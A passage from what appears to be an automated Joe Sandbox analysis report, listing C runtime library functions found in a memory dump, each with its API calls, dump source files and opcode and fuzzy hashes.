                                                                                                          • Opcode Fuzzy Hash: 325b19103732be2bf192ff6ece39d334575eded0025389ecec622df15bb6abf7
                                                                                                          • Instruction Fuzzy Hash: 6B114C36642306DBCB808F78DC60E8D73A49F837A4B03456BD824CB940EB31F50186B0
                                                                                                          Function 6FD80233 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7), ref: 6FD80263
                                                                                                          • _callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001), ref: 6FDAF24D
                                                                                                          • _callnewh.MSVCR100(00000001,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDAF270
                                                                                                          • _errno.MSVCR100(00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5), ref: 6FDAF276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _callnewh$AllocHeap_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 3215684309-0
                                                                                                          • Opcode ID: 25be4c6062b42175047f56437c841584ce8ea8b4d03170d791b4682d589c7d75
                                                                                                          • Instruction ID: e28b02d304166c22d0f45edc2cdd483be1dc6b44fac30ebd3ae1f3cdd9e7e34c
                                                                                                          • Opcode Fuzzy Hash: 25be4c6062b42175047f56437c841584ce8ea8b4d03170d791b4682d589c7d75
                                                                                                          • Instruction Fuzzy Hash: E601B579285741EAFBC12B79DC45B9A3B98EF837A8F002176E520DA1C4DFB1B8408775
                                                                                                          Function 6FDD4CB9 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CDD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CE8
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4CF6
                                                                                                          • _filbuf.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D1A
                                                                                                          • feof.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D29
                                                                                                          • ferror.MSVCR100(?,?,?,?,?,?,?,6FDD4D70,00000018), ref: 6FDD4D34
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_filbuf_invalid_parameter_invalid_parameter_noinfo_lock_filefeofferror
                                                                                                          • String ID:
                                                                                                          • API String ID: 3882155251-0
                                                                                                          • Opcode ID: cf58a10d8af8aec430ef96cb7facc001ec5297f82f9edb6f21f56c4bfbc0b5bc
                                                                                                          • Instruction ID: 9b6e314fc8e7760a53c0e161a76495b8879e01891d6b8c3bbf3634ae31d53b4d
                                                                                                          • Opcode Fuzzy Hash: cf58a10d8af8aec430ef96cb7facc001ec5297f82f9edb6f21f56c4bfbc0b5bc
                                                                                                          • Instruction Fuzzy Hash: 9F11A330A0570ADAD7819F79D44078E7BB4BF07364F20420AF4A4AF1C0DB38B6418BB4
                                                                                                          Function 6FDF9FB4 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDFA078,00000014), ref: 6FDF9FD3
                                                                                                          • _errno.MSVCR100(6FDFA078,00000014), ref: 6FDF9FDA
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDFA078,00000014), ref: 6FDF9FE5
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcslen.MSVCR100(?,6FDFA078,00000014), ref: 6FDFA009
                                                                                                          • _lock.MSVCR100(00000003,?,6FDFA078,00000014), ref: 6FDFA012
                                                                                                          • WriteConsoleW.KERNEL32(?,00007FFF,?,00000000,6FDFA078,00000014), ref: 6FDFA039
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleWrite__doserrno_errno_invalid_parameter_invalid_parameter_noinfo_lockwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1800064075-0
                                                                                                          • Opcode ID: 47c7d024309b6b7ccc7c7ee1c62ba34c365a195a98239c65778b7ffddec3612b
                                                                                                          • Instruction ID: 15ff56b222578d8d8a137690e308385fe038b596195ebbf9c28319efd441ae62
                                                                                                          • Opcode Fuzzy Hash: 47c7d024309b6b7ccc7c7ee1c62ba34c365a195a98239c65778b7ffddec3612b
                                                                                                          • Instruction Fuzzy Hash: 0811C132902356DEDBA06FB89D40D9D3BB4AF42774F164319E5309E1D8CB7479029BA1
                                                                                                          Function 6FDFCE12 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE1F
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE5B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE2A
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCE3B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE46
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCE66
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 8a7dbd80af62258e14c732e03a9febab74374edf34e488fe0e8c020ac4520f4f
                                                                                                          • Instruction ID: ffe8c305b19c9f3ee5442da36233e6ec58b6f0bdf4fc35be6f1d3817720af2bb
                                                                                                          • Opcode Fuzzy Hash: 8a7dbd80af62258e14c732e03a9febab74374edf34e488fe0e8c020ac4520f4f
                                                                                                          • Instruction Fuzzy Hash: 6B11C0B152630ADFCFA06FA4D880C8A7765AF41354B13053AF9A27A040D732B6A2D6F1
                                                                                                          Function 6FDFCD89 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDFCD96
                                                                                                          • _errno.MSVCR100 ref: 6FDFCDD2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDA1
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDFCDB2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDBD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDFCDDD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: a0e5582b95a53bf3950720f09358867b88317c0b841a58f42ebc932bc15a5fed
                                                                                                          • Instruction ID: c13e66d727f43ee2693979e1e87919b2132b923bc90e9726fe79e2f5130e91d2
                                                                                                          • Opcode Fuzzy Hash: a0e5582b95a53bf3950720f09358867b88317c0b841a58f42ebc932bc15a5fed
                                                                                                          • Instruction Fuzzy Hash: 10018471646709DFCB925F64DC40D8E7BA4EF813A4B230526E49597040E735BAA3C7B1
                                                                                                          Function 6FD8A72B Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FD8A7B0,00000010), ref: 6FD8A7D4
                                                                                                          • __doserrno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4D6
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4DE
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4F4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF4FF
                                                                                                          • _errno.MSVCR100(6FD8A7B0,00000010), ref: 6FDAF506
                                                                                                            • Part of subcall function 6FD8A4DF: EnterCriticalSection.KERNEL32(00000108,6FD8A540,0000000C,6FD8ECC3,?,6FD8ED00,00000010,6FDA89FE,?,00000000,00000002,?,6FE245D0,?,?), ref: 6FD8A530
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1720121285-0
                                                                                                          • Opcode ID: 7cbb14ac507a232003dae03007b89c04cb6bb061ee39fbf4342adaf3609d9b61
                                                                                                          • Instruction ID: 1f2b7a4290bc34da86121a86b981ea908122b032ae5b30e948118077138faada
                                                                                                          • Opcode Fuzzy Hash: 7cbb14ac507a232003dae03007b89c04cb6bb061ee39fbf4342adaf3609d9b61
                                                                                                          • Instruction Fuzzy Hash: 3911AC71801705EFE7D19F78CD8436937B0AF02328F125286D0345B5D1DBBCB9419B65
                                                                                                          Function 6FDD8154 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD8200,0000000C), ref: 6FDD816E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD8200,0000000C), ref: 6FDD8179
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __p__iob.MSVCR100(6FDD8200,0000000C), ref: 6FDD8183
                                                                                                          • __p__iob.MSVCR100(6FDD8200,0000000C), ref: 6FDD819A
                                                                                                          • __p__iob.MSVCR100(?,00000000,?,6FDD8200,0000000C), ref: 6FDD81B2
                                                                                                          • __p__iob.MSVCR100(00000000,?,00000000,?,6FDD8200,0000000C), ref: 6FDD81C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 263866100-0
                                                                                                          • Opcode ID: 5affe92d7b1b5b359850c30a1fc335ae33a73f94cd53a7916599d2f32b3e0eee
                                                                                                          • Instruction ID: 45842e88bccf07c45fd221bb4bfecb0044d2749e7902128cc2e3ddc2caf70c0c
                                                                                                          • Opcode Fuzzy Hash: 5affe92d7b1b5b359850c30a1fc335ae33a73f94cd53a7916599d2f32b3e0eee
                                                                                                          • Instruction Fuzzy Hash: 7201A2B3D44308AAEB81BFF09C86A6E37689F017A8F155225B435DA1C0DB34FD4587B1
                                                                                                          Function 6FDFBEE3 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(6FDFBF98,0000000C), ref: 6FDFBEEF
                                                                                                          • _calloc_crt.MSVCR100(00000008,00000001,6FDFBF98,0000000C), ref: 6FDFBEFA
                                                                                                          • _errno.MSVCR100(6FDFBF98,0000000C), ref: 6FDFBF0A
                                                                                                          • _lock.MSVCR100(0000000C,6FDFBF98,0000000C), ref: 6FDFBF30
                                                                                                          • _lock.MSVCR100(0000000D,6FDFBF98,0000000C), ref: 6FDFBF50
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6FDFBF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _lock$IncrementInterlocked_calloc_crt_errno_getptd
                                                                                                          • String ID:
                                                                                                          • API String ID: 2859800741-0
                                                                                                          • Opcode ID: bf86f1abd1f54b3158b0d5a59fa37d7eebb9e8fa70f0fa17e4f225f9ed0b6e7c
                                                                                                          • Instruction ID: c0bb7ead5c532f0e7129416eb9681f607855bc56564202b86bd6f7e779d9cb0c
                                                                                                          • Opcode Fuzzy Hash: bf86f1abd1f54b3158b0d5a59fa37d7eebb9e8fa70f0fa17e4f225f9ed0b6e7c
                                                                                                          • Instruction Fuzzy Hash: 9301D431502702EAEB90AFB4D805B4C77A0AF44778F205749E0759B2C0CF75B9418B75
                                                                                                          Function 6FD96A1D Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 226COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • memset.MSVCR100(?,000000FF,00000024,?,?,6FD96A18,?), ref: 6FD96A3D
                                                                                                          • _errno.MSVCR100(?,?,6FD96A18,?), ref: 6FDA9D32
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,6FD96A18,?), ref: 6FDA9D3C
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD96A18,?), ref: 6FDA9D56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemset
                                                                                                          • String ID: L[o
                                                                                                          • API String ID: 4173284227-1256444177
                                                                                                          • Opcode ID: 5007584ef163fbc89311cd1340ff66987812336bb46375fcb3fbac4d2ffe1a79
                                                                                                          • Instruction ID: e678c764579230b317357743c7e5025046937099420c488f22c4e007e51f441b
                                                                                                          • Opcode Fuzzy Hash: 5007584ef163fbc89311cd1340ff66987812336bb46375fcb3fbac4d2ffe1a79
                                                                                                          • Instruction Fuzzy Hash: E96136B1A00305AFDB549FA8CC40B9E77B6EF85328F10822EF5219B2D5D776B9408B94
                                                                                                          Function 6FD90AC0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000000,00000000,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD95C28
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDAA1A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID: $
                                                                                                          • API String ID: 2959964966-3993045852
                                                                                                          • Opcode ID: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                          • Instruction ID: 514da70a49677e1d4e7d7939917c0c555563f4941d8318311eeca9551b990d37
                                                                                                          • Opcode Fuzzy Hash: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                          • Instruction Fuzzy Hash: A271353198530ACBDB91CFB8D5487EE3BB0AF0239CF10535AD8A15B194C336BAA1C795
                                                                                                          Function 6FD80B9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FD80BE3
                                                                                                          • _errno.MSVCR100(?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FD8A424
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6FD80CD5,?,?,?,00000000), ref: 6FDAA3D3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfoiswctype
                                                                                                          • String ID: $
                                                                                                          • API String ID: 1743973646-3993045852
                                                                                                          • Opcode ID: 61afa82759853cd61d3f10f50b359bf041e57abe5136c3ff767c97159d3dcbeb
                                                                                                          • Instruction ID: 4b7c5dc051284dfda5495f8ea3452c30c8a738bb6d29ddfbe1e23bc5108dd4eb
                                                                                                          • Opcode Fuzzy Hash: 61afa82759853cd61d3f10f50b359bf041e57abe5136c3ff767c97159d3dcbeb
                                                                                                          • Instruction Fuzzy Hash: 2E51D771806719DBDBA08F68CA597DE77B4BF02398F205227E8B49B1D0D374BA90C751
                                                                                                          Function 6FDC2983 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?,00000000), ref: 6FDC29B1
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?,00000000), ref: 6FDC2A33
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,?,?,?,?,?,?,?,?,6FDBD091,?,00000000,?), ref: 6FDC2B61
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,$,
                                                                                                          • API String ID: 0-220654547
                                                                                                          • Opcode ID: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                          • Instruction ID: c0ea80c26a12ab5f736edc3b9aa56795da424e80d6bbdcf28c4edb71c00f736d
                                                                                                          • Opcode Fuzzy Hash: 80d76ad7a11ea31467d63abe963eeb7d8ebfcca97ad68425637ad4bd0bebaacb
                                                                                                          • Instruction Fuzzy Hash: E6516C71A00709DFCB68CFA4C590B9EBBB9FF05319F10952ED4AAA7244D730B941CB12
                                                                                                          Function 6FDBC6C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6FDBC6D9
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDBC79A
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDBC7A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterEventLeave
                                                                                                          • String ID: $$,
                                                                                                          • API String ID: 3094578987-53852779
                                                                                                          • Opcode ID: 50d0e81f05f9f2aebeaeef461ac890850db47be4d7b450886e1005814a15502c
                                                                                                          • Instruction ID: 4ba6c1a2d06c744ad8c3e1fc143c722cce0847cc427627613a7df40a3b0256a3
                                                                                                          • Opcode Fuzzy Hash: 50d0e81f05f9f2aebeaeef461ac890850db47be4d7b450886e1005814a15502c
